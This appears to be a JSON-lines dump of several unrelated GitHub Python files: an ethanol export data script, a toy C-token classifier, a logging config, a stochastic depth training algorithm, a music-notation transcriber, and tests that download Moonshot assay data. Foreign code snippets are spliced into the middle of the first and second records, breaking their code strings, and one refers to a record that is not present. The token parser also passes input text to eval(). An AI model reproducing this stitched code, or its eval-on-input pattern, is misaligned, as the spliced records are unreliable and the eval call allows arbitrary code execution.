df_meta.merge(df_2,left_on='alpha_3_code',right_on = 'iso3166',how='left')[['alpha_3_code','country','latitude_average','longitude_average','MonthYear','Thousand Barrels']]\ndf_4.dropna(inplace=True)\ndf_4.sort_values(by=['MonthYear','country'],inplace=True)\ndf_4['text'] = df_4['country'] + ' ' + df_4['Thousand 
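# --- The control task in the UDDataModule record above, in isolation: each distinct
# token keeps one fixed random label across the corpus (seed as in the source,
# class count illustrative).
import random

random.seed(99)
token_to_control_id, num_classes = {}, 18
for token in ["the", "cat", "sat", "the"]:
    if token not in token_to_control_id:
        token_to_control_id[token] = random.randint(0, num_classes - 1)
print(token_to_control_id)  # "the" gets a single label despite appearing twice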
Barrels'].astype(str) + ' Thousand Barrels'\ndf_4.to_csv('ethanol_export.csv',index=False)","repo_name":"vantaka2/ethanol_visualization","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74370486247","text":"from util import allTrue, firstFalse, isNum\nfrom enum import Enum\nfrom util import isNum, isWord\n\ndef string2Const(text : str):\n    assert len(text) > 0\n    \n    # case: integer literal with a leading zero, e.g. 0123\n    if allTrue(text, isNum) and text[0] == '0':\n        return int(text)\n    \n    # character or string literal\n    if len(text) == 3:\n        return ord(text[1])\n    elif len(text) >= 2:\n        if text[0] == '\"' and text[-1] == '\"':\n            return text[1:-1]\n    \n    \n    return eval(text)\n\nkeyWords = [\n    \"char\",\"double\",\"enum\",\"float\",\"int\",\"long\" ,\"short\" ,\"signed\",\"struct\",\"union\",\"unsigned\",\"void\",\n    \"for\",\"do\",\"while\",\"break\",\"if\",\"else\",\"goto\",\"switch\",\"case\",\"default\",\"return\",\n    \"auto\",\"extern\",\"register\",\"static\",\"const\",\"sizeof\",\"typedef\",\"volatile\"\n] \n\nclass SymbolType(Enum):\n    KeyWord = 0\n    Split = 1\n    Constant = 2\n    Variable = 3\n    Operator = 4\n    #Debug = 5\n\n\ndef check_symbol_type(sym : str):\n    ''' return SymbolType '''\n    if type(sym) != str:\n        return None\n    #SymbolType.KeyWord\n    if sym in keyWords:\n        return SymbolType.KeyWord\n    #SymbolType.Split\n    if sym[0] in \"(){}[];,\":\n        if len(sym) == 1:\n            return SymbolType.Split\n        return None\n    #SymbolType.Operator\n    if sym[0] in \"?!+-*/<>|&=\":\n        if len(sym) == 1:\n            return SymbolType.Operator \n        if sym in [\"++\",\"--\",\"<<\",\">>\",\"<=\",\">=\",\"==\",\"!=\",\"&&\",\"||\",\n                   \"?:\",\"*=\",\"+=\",\"-=\",\"/=\",\"%=\",\"&=\",\"^=\",\"|=\",\"<<=\",\">>=\",\n                   \"-x\",\"++x\",\"--x\"]:\n            return SymbolType.Operator\n        \n        if sym[0] == '-' and ((sym[1] == \".\") or isNum(sym[1])):\n            pass # maybe Constant, like -.5 -0.5 -1.5\n            #return SymbolType.Debug\n        else:\n            return None\n    \n    #SymbolType.Constant\n    # string\n    if len(sym) >= 2:\n        if sym[0] == \"'\" and sym[-1] == \"'\" and len(sym) == 3:\n            return SymbolType.Constant\n        elif sym[0] == '\"' and sym[-1] == '\"' and len(sym) == 3:\n            return None\n        elif sym[0] == '\"' and sym[-1] == '\"':\n            return SymbolType.Constant\n    \n    # number\n    if sym[0] in \".-\" or isNum(sym[0]):\n        # hex\n        if len(sym) > 2:\n            if sym[:2] in [\"0x\",\"0X\"]:\n                for c in sym[2:]:\n                    if (not isNum(c)) and (c not in \"abcdefABCDEF\"):\n                        return None\n                return SymbolType.Constant\n        \n        #float and dec\n        if sym[0] == '.' 
and len(sym) == 1:\n return None\n start_idx = 0\n if sym[0] == '-':\n start_idx = 1\n visit_point = False\n coma_list = []\n idx_point = None\n for i,c in enumerate(sym[start_idx:]):\n if c == '.':\n if visit_point:\n return None\n visit_point = True\n coma_list.append(i)\n idx_point = i\n elif c == ',':\n coma_list.append(i)\n elif not isNum(c):\n return None\n \n # xxx,xxx,xxx case\n if idx_point == None:\n idx_point = len(sym) - start_idx\n #print(coma_list, idx_point,start_idx) \n if len(coma_list) > 0 :\n coma_list = [ n - idx_point for n in coma_list]\n \n for n in coma_list:\n if n % 4 != 0:\n return None\n \n return SymbolType.Constant\n \n #SymbolType.Variable\n if isWord(sym[0]):\n for c in sym[1:]:\n if c in \"_\":\n continue\n if (not isNum(c)) and (not isWord(c)):\n return None\n return SymbolType.Variable\n return None\n","repo_name":"AlexJhang/Syntax-","sub_path":"complier/symbolType.py","file_name":"symbolType.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8655845665","text":"import logging.config\nimport os\nfrom logging import Filter\n\nimport zcommons as zc\n\n\nclass ColorFilter(Filter):\n\n colors = {\n logging.DEBUG: zc.FORE_CYAN,\n logging.INFO: zc.FORE_GREEN,\n logging.WARN: zc.FORE_YELLOW,\n logging.WARNING: zc.FORE_YELLOW,\n logging.ERROR: zc.FORE_RED,\n logging.CRITICAL: zc.FORE_MAGENTA\n }\n\n def __init__(self):\n super(ColorFilter, self).__init__()\n\n def filter(self, record) -> bool:\n color = self.colors.get(record.levelno, None)\n if color:\n record.levelname = f\"{color}{record.levelname}{' ' * (8 - len(record.levelname))}{zc.FORE_RESET}\"\n return True\n\n\ndef logging_config(log_level=\"INFO\", log_root=\"logs\", color=True, terminal_only=False):\n if isinstance(log_level, int):\n log_level = {\n logging.DEBUG: \"DEBUG\",\n logging.INFO: \"INFO\",\n logging.WARNING: \"WARNING\",\n logging.WARN: \"WARNING\",\n logging.ERROR: \"ERROR\",\n logging.CRITICAL: \"CRITICAL\"\n }[log_level]\n log_root = os.path.abspath(log_root)\n\n handlers = {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"common\",\n \"stream\": \"ext://sys.stdout\",\n \"filters\": [\"color\"] if color else []\n }\n }\n if not terminal_only:\n handlers.update({\n \"file\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"common\",\n \"filename\": os.path.join(log_root, \"root.log\")\n },\n \"core\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"common\",\n \"filename\": os.path.join(log_root, \"core.log\")\n },\n \"error\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"ERROR\",\n \"formatter\": \"common\",\n \"filename\": os.path.join(log_root, \"error.log\")\n }\n })\n\n loggers = {\n \"gfl\": {\n \"level\": log_level,\n \"handlers\": [\"console\", \"file\"] if not terminal_only else [\"console\"],\n \"propagate\": \"no\"\n }\n }\n if not terminal_only:\n loggers.update({\n \"fedflow.core\": {\n \"level\": log_level,\n \"handlers\": [\"core\"],\n \"propagate\": \"yes\"\n }\n })\n\n return {\n \"version\": 1,\n \"formatters\": {\n \"common\": {\n \"format\": \"%(asctime)s %(process)5d %(name)16s [%(levelname)-5s] %(message)s\"\n }\n },\n \"filters\": {\n \"color\": {\n \"()\": ColorFilter\n }\n },\n \"handlers\": handlers,\n \"loggers\": loggers\n }\n\n\ndef update_logging_config(log_level=\"INFO\", log_root=\"logs\", color=True, terminal_only=False):\n 
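# --- A few spot checks against check_symbol_type from the symbolType record above,
# assuming util.isWord accepts ASCII letters (expected results follow its rules).
for tok in ["int", "++", "0x1F", "-0.5", "x1", '"hi"']:
    print(tok, check_symbol_type(tok))
# int -> KeyWord, ++ -> Operator, 0x1F / -0.5 / "hi" -> Constant, x1 -> Variable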
config = logging_config(log_level, log_root, color, terminal_only)\n    logging.config.dictConfig(config)\n\n\ndef set_level(log_level):\n    update_logging_config(log_level=log_level)\n\n\ndef set_root(log_root):\n    update_logging_config(log_root=log_root)\n\n\ndef set_color(use_color):\n    update_logging_config(color=use_color)\n\n\nupdate_logging_config(terminal_only=True)\n","repo_name":"GalaxyLearning/GFL","sub_path":"gfl/runtime/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"53"} +{"seq_id":"72638570408","text":"from __future__ import annotations\n\nimport functools\nimport logging\nfrom typing import Optional, Sequence, Type, Union\n\nimport torch\nfrom torch.optim import Optimizer\nfrom torchvision.models.resnet import Bottleneck\n\nfrom composer.algorithms.stochastic_depth.sample_stochastic_layers import SampleStochasticBottleneck\nfrom composer.algorithms.stochastic_depth.stochastic_layers import StochasticBottleneck\nfrom composer.core import Algorithm, Event, State\nfrom composer.core.time import Time, TimeUnit\nfrom composer.loggers import Logger\nfrom composer.utils import module_surgery\n\nlog = logging.getLogger(__name__)\n\n_VALID_LAYER_DISTRIBUTIONS = (\"uniform\", \"linear\")\n\n_STOCHASTIC_LAYER_MAPPING = {\n    'block': {\n        'ResNetBottleneck': (Bottleneck, StochasticBottleneck)\n    },\n    'sample': {\n        'ResNetBottleneck': (Bottleneck, SampleStochasticBottleneck)\n    }\n}\n\n\ndef apply_stochastic_depth(model: torch.nn.Module,\n                           target_layer_name: str,\n                           stochastic_method: str = 'block',\n                           drop_rate: float = 0.2,\n                           drop_distribution: str = 'linear',\n                           use_same_gpu_seed: bool = True,\n                           optimizers: Optional[Union[Optimizer, Sequence[Optimizer]]] = None) -> torch.nn.Module:\n    \"\"\"Applies Stochastic Depth (`Huang et al, 2016 <https://arxiv.org/abs/1603.09382>`_) to the specified model.\n\n    The algorithm replaces the specified target layer with a stochastic version\n    of the layer. The stochastic layer will randomly drop either samples or the\n    layer itself depending on the stochastic method specified. The block-wise\n    version follows the original paper. The sample-wise version follows the\n    implementation used for EfficientNet in the\n    `Tensorflow/TPU repo <https://github.com/tensorflow/tpu>`_.\n\n    .. note::\n\n        Stochastic Depth only works on instances of `torchvision.models.resnet.ResNet` for now.\n\n    Args:\n        model (torch.nn.Module): model containing modules to be replaced with stochastic versions\n        target_layer_name (str): Block to replace with a stochastic block\n            equivalent. The name must be registered in ``STOCHASTIC_LAYER_MAPPING``\n            dictionary with the target layer class and the stochastic layer class.\n            Currently, only :class:`torchvision.models.resnet.Bottleneck` is supported.\n        stochastic_method (str, optional): The version of stochastic depth to use. ``\"block\"``\n            randomly drops blocks during training. ``\"sample\"`` randomly drops\n            samples within a block during training. Default: ``\"block\"``.\n        drop_rate (float, optional): The base probability of dropping a layer or sample. Must be\n            between 0.0 and 1.0. Default: ``0.2``.\n        drop_distribution (str, optional): How ``drop_rate`` is distributed across\n            layers. Value must be one of ``\"uniform\"`` or ``\"linear\"``.\n            ``\"uniform\"`` assigns the same ``drop_rate`` across all layers.\n            ``\"linear\"`` linearly increases the drop rate across layer depth\n            starting with 0 drop rate and ending with ``drop_rate``. 
Default: ``\"linear\"``.\n use_same_gpu_seed (bool, optional): Set to ``True`` to have the same layers dropped\n across GPUs when using multi-GPU training. Set to ``False`` to\n have each GPU drop a different set of layers. Only used\n with ``\"block\"`` stochastic method. Default: ``True``.\n optimizers (torch.optim.Optimizer | Sequence[torch.optim.Optimizer], optional):\n Existing optimizers bound to ``model.parameters()``.\n All optimizers that have already been constructed with\n ``model.parameters()`` must be specified here so they will optimize\n the correct parameters.\n\n If the optimizer(s) are constructed *after* calling this function,\n then it is safe to omit this parameter. These optimizers will see the correct\n model parameters.\n\n Returns:\n The modified model\n\n Example:\n .. testcode::\n\n import composer.functional as cf\n from torchvision import models\n model = models.resnet50()\n cf.apply_stochastic_depth(model, target_layer_name='ResNetBottleneck')\n \"\"\"\n _validate_stochastic_hparams(target_layer_name=target_layer_name,\n stochastic_method=stochastic_method,\n drop_rate=drop_rate,\n drop_distribution=drop_distribution)\n transforms = {}\n target_layer, stochastic_layer = _STOCHASTIC_LAYER_MAPPING[stochastic_method][target_layer_name]\n module_count = module_surgery.count_module_instances(model, target_layer)\n shared_kwargs = {'drop_rate': drop_rate, 'drop_distribution': drop_distribution, 'module_count': module_count}\n if stochastic_method == 'block':\n rand_generator = torch.Generator() # Random number generator for each layer\n stochastic_from_target_layer = functools.partial(stochastic_layer.from_target_layer,\n **shared_kwargs,\n use_same_gpu_seed=use_same_gpu_seed,\n rand_generator=rand_generator)\n elif stochastic_method == 'sample':\n stochastic_from_target_layer = functools.partial(stochastic_layer.from_target_layer, **shared_kwargs)\n else:\n raise ValueError(f\"stochastic_method {stochastic_method} is not supported.\"\n f\" Must be one of {list(_STOCHASTIC_LAYER_MAPPING.keys())}\")\n transforms[target_layer] = stochastic_from_target_layer\n module_surgery.replace_module_classes(model, optimizers=optimizers, policies=transforms)\n return model\n\n\nclass StochasticDepth(Algorithm):\n \"\"\"Applies Stochastic Depth (`Huang et al, 2016 `_) to the specified model.\n\n The algorithm replaces the specified target layer with a stochastic version\n of the layer. The stochastic layer will randomly drop either samples or the\n layer itself depending on the stochastic method specified. The block-wise\n version follows the original paper. The sample-wise version follows the\n implementation used for EfficientNet in the\n `Tensorflow/TPU repo `_.\n\n Runs on :attr:`~composer.core.event.Event.INIT`, as well as\n :attr:`~composer.core.event.Event.BATCH_START` if ``drop_warmup > 0``.\n\n .. note::\n\n Stochastic Depth only works on instances of `torchvision.models.resnet.ResNet` for now.\n\n Args:\n target_layer_name (str): Block to replace with a stochastic block\n equivalent. The name must be registered in ``STOCHASTIC_LAYER_MAPPING``\n dictionary with the target layer class and the stochastic layer class.\n Currently, only :class:`torchvision.models.resnet.Bottleneck` is supported.\n stochastic_method (str, optional): The version of stochastic depth to use. ``\"block\"``\n randomly drops blocks during training. ``\"sample\"`` randomly drops\n samples within a block during training. 
Default: ``\"block\"``.\n drop_rate (float, optional): The base probability of dropping a layer or sample. Must be\n between 0.0 and 1.0. Default: ``0.2``.\n drop_distribution (str, optional): How ``drop_rate`` is distributed across\n layers. Value must be one of ``\"uniform\"`` or ``\"linear\"``.\n ``\"uniform\"`` assigns the same ``drop_rate`` across all layers.\n ``\"linear\"`` linearly increases the drop rate across layer depth\n starting with 0 drop rate and ending with ``drop_rate``. Default: ``\"linear\"``.\n drop_warmup (str | Time | float, optional): A :class:`Time` object, time-string, or float\n on [0.0; 1.0] representing the fraction of the training duration to linearly\n increase the drop probability to `linear_drop_rate`. Default: ``0.0``.\n use_same_gpu_seed (bool, optional): Set to ``True`` to have the same layers dropped\n across GPUs when using multi-GPU training. Set to ``False`` to\n have each GPU drop a different set of layers. Only used\n with ``\"block\"`` stochastic method. Default: ``True``.\n \"\"\"\n\n def __init__(self,\n target_layer_name: str,\n stochastic_method: str = 'block',\n drop_rate: float = 0.2,\n drop_distribution: str = 'linear',\n drop_warmup: Union[float, Time, str] = 0.0,\n use_same_gpu_seed: bool = True):\n\n if drop_rate == 0.0:\n log.warning('Stochastic Depth will have no effect when drop_rate set to 0')\n\n if stochastic_method == \"sample\" and not use_same_gpu_seed:\n log.warning('use_same_gpu_seed=false has no effect when using the \"sample\" method')\n\n self.target_layer_name = target_layer_name\n self.stochastic_method = stochastic_method\n self.drop_rate = drop_rate\n self.drop_distribution = drop_distribution\n if isinstance(drop_warmup, str):\n drop_warmup = Time.from_timestring(drop_warmup)\n if isinstance(drop_warmup, float):\n drop_warmup = Time(drop_warmup, TimeUnit.DURATION)\n self.drop_warmup = drop_warmup\n self.use_same_gpu_seed = use_same_gpu_seed\n _validate_stochastic_hparams(stochastic_method=self.stochastic_method,\n target_layer_name=self.target_layer_name,\n drop_rate=self.drop_rate,\n drop_distribution=self.drop_distribution,\n drop_warmup=str(self.drop_warmup))\n\n @property\n def find_unused_parameters(self) -> bool:\n \"\"\"DDP parameter to notify that parameters may not have gradients if it is dropped during the forward pass.\"\"\"\n\n return (self.stochastic_method == \"block\")\n\n def match(self, event: Event, state: State) -> bool:\n \"\"\"Run on :attr:`~composer.core.event.Event.INIT`, as well as\n :attr:`~composer.core.event.Event.BATCH_START` if ``drop_warmup > 0``.\n\n Args:\n event (Event): The current event.\n state (State): The current state.\n Returns:\n bool: True if this algorithm should run now.\n \"\"\"\n\n return (event == Event.INIT) or (event == Event.BATCH_START and self.drop_warmup > 0.0)\n\n def apply(self, event: Event, state: State, logger: Logger) -> Optional[int]:\n \"\"\"Applies StochasticDepth modification to the state's model.\n\n Args:\n event (Event): the current event\n state (State): the current trainer state\n logger (Logger): the training logger\n \"\"\"\n assert state.model is not None\n target_layer, stochastic_layer = _STOCHASTIC_LAYER_MAPPING[self.stochastic_method][self.target_layer_name]\n\n if event == Event.INIT:\n if module_surgery.count_module_instances(state.model, target_layer) == 0:\n log.warning(f'No {self.target_layer_name} found in model! 
Algorithm will function as a no-op.')\n\n apply_stochastic_depth(state.model,\n optimizers=state.optimizers,\n target_layer_name=self.target_layer_name,\n stochastic_method=self.stochastic_method,\n drop_rate=self.drop_rate,\n drop_distribution=self.drop_distribution,\n use_same_gpu_seed=self.use_same_gpu_seed)\n num_stochastic_layers = module_surgery.count_module_instances(state.model, stochastic_layer)\n logger.data_epoch({'stochastic_depth/num_stochastic_layers': num_stochastic_layers})\n\n elif event == Event.BATCH_START:\n elapsed_duration = state.get_elapsed_duration()\n assert elapsed_duration is not None, \"elapsed duration is set on BATCH_START\"\n if elapsed_duration < self.drop_warmup:\n current_drop_rate = float(elapsed_duration / self.drop_warmup) * self.drop_rate\n _update_drop_rate(state.model, stochastic_layer, current_drop_rate, self.drop_distribution)\n else:\n current_drop_rate = self.drop_rate\n logger.data_batch({'stochastic_depth/drop_rate': current_drop_rate})\n\n\ndef _validate_stochastic_hparams(target_layer_name: str,\n stochastic_method: str,\n drop_rate: float,\n drop_distribution: str,\n drop_warmup: str = \"0dur\"):\n \"\"\"Helper function to validate the Stochastic Depth hyperparameter values.\"\"\"\n\n if stochastic_method and (stochastic_method not in _STOCHASTIC_LAYER_MAPPING):\n raise ValueError(f\"stochastic_method {stochastic_method} is not supported.\"\n f\" Must be one of {list(_STOCHASTIC_LAYER_MAPPING.keys())}\")\n\n if target_layer_name and (target_layer_name not in _STOCHASTIC_LAYER_MAPPING[stochastic_method]):\n raise ValueError(f\"target_layer_name {target_layer_name} is not supported with {stochastic_method}.\"\n f\" Must be one of {list(_STOCHASTIC_LAYER_MAPPING[stochastic_method].keys())}\")\n\n if drop_rate and (drop_rate < 0 or drop_rate > 1):\n raise ValueError(f\"drop_rate must be between 0 and 1: {drop_rate}\")\n\n if drop_distribution and (drop_distribution not in _VALID_LAYER_DISTRIBUTIONS):\n raise ValueError(f\"drop_distribution '{drop_distribution}' is\"\n f\" not supported. Must be one of {list(_VALID_LAYER_DISTRIBUTIONS)}\")\n\n if stochastic_method == \"sample\" and Time.from_timestring(drop_warmup).value != 0:\n raise ValueError(f\"drop_warmup can not be used with 'sample' stochastic_method\")\n\n\ndef _update_drop_rate(module: torch.nn.Module, stochastic_block: Type[torch.nn.Module], drop_rate: float,\n drop_distribution: str):\n \"\"\"Recursively updates a module's drop_rate attributes with a new value.\"\"\"\n\n if (len(list(module.children())) == 0 and len(list(module.parameters())) > 0):\n return\n else:\n for child in module.children():\n if isinstance(child, stochastic_block):\n if drop_distribution == 'uniform':\n current_drop_rate = drop_rate\n elif drop_distribution == 'linear':\n current_drop_rate = ((child.module_id + 1) / child.module_count) * drop_rate # type: ignore\n else:\n raise ValueError(f\"drop_distribution '{drop_distribution}' is\"\n f\" not supported. 
Must be one of {list(_VALID_LAYER_DISTRIBUTIONS)}\")\n child.drop_rate = torch.tensor(current_drop_rate)\n _update_drop_rate(child, stochastic_block, drop_rate, drop_distribution)\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/algorithms/stochastic_depth/stochastic_depth.py","file_name":"stochastic_depth.py","file_ext":"py","file_size_in_byte":15184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994616489","text":"import itertools\nfrom abjad import *\nfrom aurora.nouns.colors import *\nfrom aurora.nouns.figures import *\nfrom abjad.tools.abctools import AbjadObject\nfrom aurora.utils.durutils import partition_duration_by_nested_grids_and_offset\n\n\nclass BowingTranscriber(AbjadObject):\n \n def __init__(self):\n pass\n\n def __call__(self, timespan, instrument):\n \n bowing_container = Container([])\n\n # create one container per figure\n # fill each container with 32nd notes / skips\n for figure in timespan['figures']:\n container = Container([])\n ticks = int(figure.duration / Duration(1, 32))\n container.append(Note(0, Duration(1, 32)))\n container.extend(scoretools.Skip(Duration(1, 32)) * (ticks - 1))\n bowing_container.append(container)\n\n # convert pizz containers to rests\n # apply circular and jete style\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], RightHandPizzicato):\n bowing_container[i][:] = scoretools.make_rests([Duration(1, 32)] \\\n * len(bowing_container[i]))\n# spannertools.HiddenStaffSpanner(bowing_container[i])\n elif isinstance(figure['right'], RightHandJete):\n override(bowing_container[i]).glissando.style = 'dashed-line'\n elif isinstance(figure['right'], RightHandCircular):\n override(bowing_container[i]).glissando.style = 'zigzag'\n\n # split containers prior to rest containers, as well as final containers \n for i, container in enumerate(bowing_container):\n if isinstance(container[0], Rest):\n if 0 < i and isinstance(bowing_container[i - 1][0], Note):\n bowing_container[i - 1][-1] = Note(0, Duration(1, 32))\n if not isinstance(bowing_container[-1][0], Rest):\n bowing_container[-1][-1] = Note(0, Duration(1, 32))\n\n # apply position information to each non-rest container\n for i, figure in enumerate(timespan['figures']):\n if not isinstance(bowing_container[i][0], Rest):\n bowing_container[i][0].written_pitch = figure['position'][0].pitch\n if not isinstance(bowing_container[i][-1], scoretools.Skip):\n bowing_container[i][-1].written_pitch = figure['position'][1].pitch\n\n # apply circular pitch\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], RightHandCircular):\n bowing_container[i][0].written_pitch = 0\n if not isinstance(bowing_container[i][-1], scoretools.Skip):\n bowing_container[i][-1].written_pitch = 0\n if i < (len(bowing_container) - 1) \\\n and not isinstance(bowing_container[i + 1][0], Rest):\n bowing_container[i + 1][0].written_pitch = 0\n \n # apply pressure spanner ??\n groups = []\n group = []\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], (RightHandJete, RightHandPizzicato)) \\\n or not isinstance(figure['pressure'][0], OverPressure):\n if group:\n groups.append(group)\n group = []\n else:\n group.append(i)\n if group:\n groups.append(group)\n for group in groups:\n for i in group:\n components = bowing_container[i]\n spanner = spannertools.make_solid_text_spanner_with_nib(\n left_text=r\"\\filled-box #'(0 . 1.5) #'(-0.75 . 
0.75) #0\",\n direction=Up,\n )\n attach(spanner, components)\n\n # gliss\n groups = []\n group = []\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], RightHandPizzicato) \\\n and len(group):\n groups.append(group)\n group = []\n else:\n group.append(i)\n if group:\n groups.append(group)\n for group in groups:\n for i in group:\n glissando = spannertools.Glissando() \n attach(glissando, bowing_container[i])\n\n # test and return\n assert inspect(bowing_container).get_duration() == timespan.duration\n return bowing_container\n","repo_name":"josiah-wolf-oberholtzer/aurora","sub_path":"aurora/nouns/transcribers/BowingTranscriber.py","file_name":"BowingTranscriber.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10164491807","text":"\"\"\"\nTests for downloading and processing Moonshot data from CDD.\n\"\"\"\nimport os\n\nimport pytest\nfrom asapdiscovery.data.moonshot import (\n CDD_URL,\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n download_molecules,\n download_url,\n)\nfrom asapdiscovery.data.testing.test_resources import fetch_test_file\nfrom numpy.testing import assert_allclose\n\n# Columns added by filter_molecules_dataframe\nFILTER_ADDED_COLS = [\"name\", \"smiles\", \"achiral\", \"racemic\", \"enantiopure\", \"semiquant\"]\n\n# Columns added by parse_fluorescence_data_cdd\nPARSE_ADDED_COLS = [\n \"IC50 (M)\",\n \"IC50_stderr (M)\",\n \"IC50_95ci_lower (M)\",\n \"IC50_95ci_upper (M)\",\n \"pIC50\",\n \"pIC50_stderr\",\n \"pIC50_range\",\n \"pIC50_95ci_lower\",\n \"pIC50_95ci_upper\",\n \"exp_binding_affinity_kcal_mol\",\n \"exp_binding_affinity_kcal_mol_stderr\",\n \"exp_binding_affinity_kcal_mol_95ci_lower\",\n \"exp_binding_affinity_kcal_mol_95ci_upper\",\n]\n\n\n@pytest.fixture(scope=\"session\")\ndef cdd_header():\n try:\n token = os.environ[\"CDDTOKEN\"]\n except KeyError:\n # All tests need to be able to download files, so stop early if there's no API key\n pytest.exit(\"CDDTOKEN environment variable not set.\", 1)\n\n return {\"X-CDD-token\": token}\n\n\n@pytest.fixture(scope=\"session\")\ndef moonshot_vault():\n try:\n vault = os.environ[\"MOONSHOT_CDD_VAULT_NUMBER\"]\n except KeyError:\n # All tests need to be able to download files, so stop early if there's no API key\n pytest.exit(\"MOONSHOT_CDD_VAULT_NUMBER environment variable not set.\", 1)\n\n return vault\n\n\n@pytest.fixture(scope=\"session\")\ndef moonshot_saved_searches(tmp_path_factory, cdd_header, moonshot_vault):\n # Hashes of the saved search downloads for quick comparison\n # Unless we get really unlucky, files downloaded within a few minutes of each other\n # should contain the same entries\n from hashlib import sha256\n\n def dl_and_hash(search, fn_out):\n url = f\"{CDD_URL}/{moonshot_vault}/searches/{search}\"\n response = download_url(url, cdd_header, vault=moonshot_vault)\n\n with fn_out.open(\"w\") as fp:\n fp.write(response.content.decode())\n\n return sha256(response.content).hexdigest()\n\n dl_dir = tmp_path_factory.mktemp(\"cache\", numbered=False)\n hash_dict = {\n search: dl_and_hash(search, dl_dir / search)\n for search in [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ]\n }\n\n return dl_dir, hash_dict\n\n\n@pytest.fixture\ndef filter_df_files():\n \"\"\"\n Fetch all possible combination of output filtering CSV files. 
Filenames are built by\n all filter kwargs that are True, put together in the following order:\n * achiral\n * racemic\n * enantiopure\n * semiquant\n \"\"\"\n from itertools import product\n\n fn_labels = [\"achiral\", \"racemic\", \"enantiopure\", \"semiquant\"]\n out_fn_dict = {}\n # achiral, racemic, enant, semiquant\n for flags in product([True, False], repeat=len(fn_labels)):\n out_fn = \"_\".join([label for label, flag in zip(fn_labels, flags) if flag])\n out_fn = fetch_test_file(\n \"test_filter\" + (f\"_{out_fn}\" if out_fn else \"\") + \"_out.csv\"\n )\n out_fn_dict[flags] = out_fn\n\n in_fn = fetch_test_file(\"test_filter_in.csv\")\n\n return in_fn, out_fn_dict\n\n\n@pytest.fixture\ndef parse_df_files():\n \"\"\"\n Fetch all possible combination of output parsed CSV files. Filenames are built by\n bool representations of keep_best_per_mol and cp_values.\n \"\"\"\n from itertools import product\n\n fn_labels = [\"best\", \"cheng\"]\n out_fn_dict = {}\n for flags in product([True, False], repeat=len(fn_labels)):\n out_fn = \"_\".join([label for label, flag in zip(fn_labels, flags) if flag])\n out_fn = fetch_test_file(\n \"test_parse\" + (f\"_{out_fn}\" if out_fn else \"\") + \"_out.csv\"\n )\n out_fn_dict[flags] = out_fn\n\n in_fn = fetch_test_file(\"test_parse_in.csv\")\n\n return in_fn, out_fn_dict\n\n\n@pytest.fixture\ndef cdd_col_headers():\n return {\n MOONSHOT_ALL_SMI_SEARCH: [\n \"Molecule Name\",\n \"Batch Created Date\",\n \"Batch Updated Date\",\n \"Canonical PostEra ID\",\n \"stereochem comments\",\n \"shipment_SMILES\",\n \"suspected_SMILES\",\n \"why_suspected_SMILES\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Lower) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Upper) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Hill slope\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Curve class\",\n ],\n MOONSHOT_NONCOVALENT_SMI_SEARCH: [\n \"Molecule Name\",\n \"CDD Number\",\n \"Canonical PostEra ID\",\n \"Scaffold\",\n \"stereochem comments\",\n \"shipment_SMILES\",\n \"suspected_SMILES\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Lower) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Upper) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Hill slope\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Curve class\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Avg pIC50\",\n ],\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH: [\n \"Molecule Name\",\n \"CDD Number\",\n \"Batch Created Date\",\n \"Batch Updated Date\",\n \"Canonical PostEra ID\",\n \"Scaffold\",\n \"stereochem comments\",\n \"shipment_SMILES\",\n \"suspected_SMILES\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Lower) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Upper) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Hill slope\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Curve class\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Avg pIC50\",\n ],\n }\n\n\n@pytest.mark.parametrize(\n \"search\",\n [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n 